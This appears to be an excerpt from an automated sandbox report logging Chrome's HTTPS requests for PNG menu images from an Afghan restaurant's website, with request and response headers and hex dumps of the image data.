                                                                                                                                                    78192.168.2.449844162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:48 UTC663OUTGET /assets/imgs/menu_imges/Rice_with_Spinach.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:43:02 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 46099
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 4b 08 06 00 00 00 92 a1 7e 13 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRK~pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC13331INData Raw: c3 a2 50 37 59 5c 2f b2 a7 3f c4 8d 65 9b d9 f5 06 cb 25 83 a5 b2 c9 e5 55 83 56 d5 46 c6 e1 f9 57 e7 50 7d 81 d9 34 19 ce 46 39 b0 7b 27 3f f2 1d 9f 24 22 e5 d9 7d f4 10 d6 5a 91 95 62 93 b9 bc c5 ee a3 9b 79 e7 4f fe 7b 42 e3 07 d0 cb 97 d9 da a7 f3 f5 17 a6 29 cb 32 37 e6 4a 2c cc 2f d3 37 d4 4d 6d bd c6 b1 b7 bd 85 9e a4 c2 8b 5f 79 0e 3d 00 fd 5d 19 4c cb 40 f6 1d 02 e1 10 bb 46 b3 44 a3 71 f6 ee db 8b 24 24 64 25 40 28 9e 45 d1 14 f4 50 d8 58 59 cd ff 5a b3 d1 b0 9b 8d 06 e5 d5 69 5c d7 c6 75 ed f7 0d 6f da 35 d6 6c d4 30 cd 26 7a 30 02 42 a2 65 58 34 2f 3f 46 58 69 62 68 3d 6c 71 16 10 86 45 ab e5 62 36 2b c4 dd 02 c9 9a 01 2d 13 b3 66 51 ab 40 b9 e2 b3 6d 73 86 d1 6e 9d d9 c9 3a d7 d7 d7 d9 33 04 5a 50 a7 ee b9 7c ed 92 45 a9 98 67 d4 5f a6 7a 6d
                                                                                                                                                    Data Ascii: P7Y\/?e%UVFWP}4F9{'?$"}ZbyO{B)27J,/7Mm_y=]L@FDq$$d%@(EPXYZi\uo5l0&z0BeX4/?FXibh=lqEb6+-fQ@msn:3ZP|Eg_zm


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    79192.168.2.449845162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC660OUTGET /assets/imgs/menu_imges/Rice_with_Dhal.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:40:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38109
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 75 00 00 00 4b 08 06 00 00 00 4e 74 c8 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRuKNtapHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC8192INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC13533INData Raw: f0 c6 d7 3f f4 1f ee bc fb ee 7f 96 18 06 31 6d 07 db 14 e0 df a0 c7 14 58 72 23 02 70 63 d8 b6 be 17 01 f8 2b d6 9a 06 44 6b c8 f1 50 c1 f6 ad 63 24 b4 d9 1a b1 86 3c 77 02 b0 cd f6 79 b9 1c e0 78 3e 6f 7c d7 3f a1 36 3f 45 14 38 48 29 88 a2 08 4d 4a 34 5d 9f 2b 2f d5 3e d4 ac 37 bf 66 f7 a4 91 4a 21 a4 24 32 6c e2 c4 05 29 11 48 a4 a6 11 c7 b1 1f af b1 1e 13 d1 89 a6 0c d2 99 34 8d 6a 13 99 92 d4 7a 3a b1 a6 35 98 af a1 4c 1d 29 c1 d0 da c4 ee d4 e5 26 3a b0 a8 e7 18 7f e3 dd 94 66 e6 49 9f b9 ca ee f5 eb 68 cc 5f a1 7a e2 29 96 77 14 09 f7 6e 20 f9 cc 79 36 9c bb 4c 42 c4 92 a6 d1 8c 25 ca 93 24 71 84 eb 47 f4 64 14 7a 33 a1 32 33 43 17 55 a4 e8 25 06 84 14 b4 9a 2d ba 3a 4b b7 d4 66 2f 30 3b 19 51 39 fb 12 d3 a7 9e a1 ef d0 1d 68 ba f5 ff 1f 54 a9 69
                                                                                                                                                    Data Ascii: ?1mXr#pc+DkPc$<wyx>o|?6?E8H)MJ4]+/>7fJ!$2l)H4jz:5L)&:fIh_z)wn y6LB%$qGdz323CU%-:Kf/0;Q9hTi


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    80192.168.2.449846162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC663OUTGET /assets/imgs/menu_imges/Vegetarian_Ashaak.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:22:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39243
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 69 00 00 00 4b 08 06 00 00 00 73 e6 a9 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRiKspHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC6016INData Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: eb 66 66 26 5f 9a 18 19 38 93 8d c7 1f d5 72 d9 03 d9 52 ce ca 65 52 04 fc 41 c2 95 35 e4 0b 05 fc 6e 1f 86 69 93 2e 64 b1 0d 70 f8 bc d8 b6 40 2c be 88 db e7 c7 2d 88 78 dc 2a 26 02 92 a4 82 56 c4 56 44 04 5b 22 91 8c 11 aa 8e 22 c9 0e 8a f1 45 44 6c 44 8f 0b 19 11 45 75 70 e4 99 07 a9 a8 6b 62 cd ce ab 39 71 fa 24 8a d3 81 cf e5 a5 94 cf 20 48 06 1e d9 8b 29 08 98 82 4d 28 5c c1 f8 40 1f 07 ee fe 36 6e 8f 17 41 5c 8a 97 5c 22 4d e7 25 57 d3 b4 e3 7a be f2 91 3b fe 25 48 ff 9d 47 10 40 b0 05 92 89 18 6a a1 48 5d 43 5b 93 b7 bc aa 43 75 b9 c2 b2 e2 0c 7b bd be ea 8a aa 8a 4a 8f c7 d7 ee f3 05 96 7b 03 fe b0 c7 e7 c3 a1 aa 94 b4 22 c5 62 8e da da aa dd eb d7 af db 9d 4e a5 ff 2c 11 5b 4c 2d cc cd 3e 35 3a d8 fb 7c 6c 71 fe a1 64 32 39 53 c8 e7 71 ca 0e 04
                                                                                                                                                    Data Ascii: ff&_8rReRA5ni.dp@,-x*&VVD[""EDlDEupkb9q$ H)M(\@6nA\\"M%Wz;%HG@jH]C[Cu{J{"bN,[L->5:|lqd29Sq
                                                                                                                                                    2024-10-01 04:26:49 UTC459INData Raw: b9 f1 4b f5 2b 36 be 31 52 d3 88 bb 94 27 97 88 93 4b 27 c9 a5 92 4b e3 9c 4c 82 5c 6a 91 62 31 bb d4 ac b6 af a5 69 d5 46 1a 96 d5 e3 15 20 6f 43 36 65 c4 86 8e f7 0e b8 5d c2 cf 1b 96 b7 3f 39 33 93 0e c6 46 46 c4 a9 fe d3 96 a4 2a ba a5 5b c9 7c 26 33 9e cd 5b a6 2c 8b f8 cb 2a 41 50 11 e5 5f 39 b6 8b 48 8a eb 82 10 cc fe ff 15 a4 7f be d2 97 54 07 9e 50 25 b6 a9 cd 4f 9c de ff a6 85 e1 73 1f 2d 6f 5a f1 b5 a6 35 db ae 2f 8b 36 e2 8b e4 c9 24 63 64 e2 73 c8 25 07 91 fa 56 2a 1b 3b 68 ee 5a 45 99 5b 44 b3 61 7a 74 fe d8 c9 81 9e fb e3 53 53 4f e7 d2 99 63 73 63 93 a8 61 17 e2 23 79 c6 7a 8e d1 da be 0d 9f bf 02 d3 2a 81 25 22 ca 0a 81 48 18 d5 e5 86 94 70 c1 79 d8 fe 47 c3 92 df f2 7b 10 7e 77 41 fa df b7 c4 0e 17 0e 97 07 2d 97 19 1f 79 e9 b1 1b e6 07
                                                                                                                                                    Data Ascii: K+61R'K'KL\jb1iF oC6e]?93FF*[|&3[,*AP_9HTP%Os-oZ5/6$cds%V*;hZE[DaztSSOcsca#yz*%"HpyG{~wA-y


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    81192.168.2.449847162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC659OUTGET /assets/imgs/menu_imges/Potato_Borani.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:16:34 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37903
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC6016INData Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC15503INData Raw: 14 a7 cb 85 69 e9 8a 9a d5 24 87 cd 26 c9 36 45 56 64 9b 22 2a 8a 2c 80 2c 49 92 2c c9 b2 28 89 92 82 20 20 88 22 96 05 96 65 21 02 ba 69 aa f1 58 2c d6 db df 77 bc a9 77 e8 8d 6c 4a eb f7 b9 dd 44 4d 1b 87 df 78 9c ce 4f 37 e2 29 29 e2 a4 ab 7e 8a a4 38 b0 39 3c 34 76 f6 d1 dc dc 8c cb e9 04 20 ab 6a 84 7d 2e 4a fd 4e ec 81 62 44 11 ee f9 e1 65 5f 0e ee bf 72 48 92 44 df e0 00 45 e9 22 fb d2 d3 bf 76 47 d5 e8 29 cb ed 36 47 99 2c 2b 5e 41 14 5c 02 82 e0 f6 b8 71 b8 9c 08 08 64 33 1a aa 6e 30 7f f1 a9 c8 b2 0d dd 30 30 4c 50 33 29 6c 36 1b a2 62 43 00 0c 43 c7 d0 75 24 51 c2 c4 22 9b cd 10 2c 2e 41 40 40 90 24 44 49 c1 d4 74 2c cb c0 12 2c 4c c3 c0 c2 42 30 c1 12 c0 b2 00 cb c4 42 00 01 40 40 14 84 2f 9e 0b 82 40 b8 a8 94 ea aa 0a 26 26 a3 3d 9f 1d ee b8
                                                                                                                                                    Data Ascii: i$&6EVd"*,,I,( "e!iX,wwlJDMxO7))~89<4v j}.JNbDe_rHDE"vG)6G,+^A\qd3n000LP3)l6bCCu$Q",.A@@$DIt,,LB0B@@/@&&=


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    82192.168.2.449848162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC659OUTGET /assets/imgs/menu_imges/Borani_Banjan.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:10:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39437
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
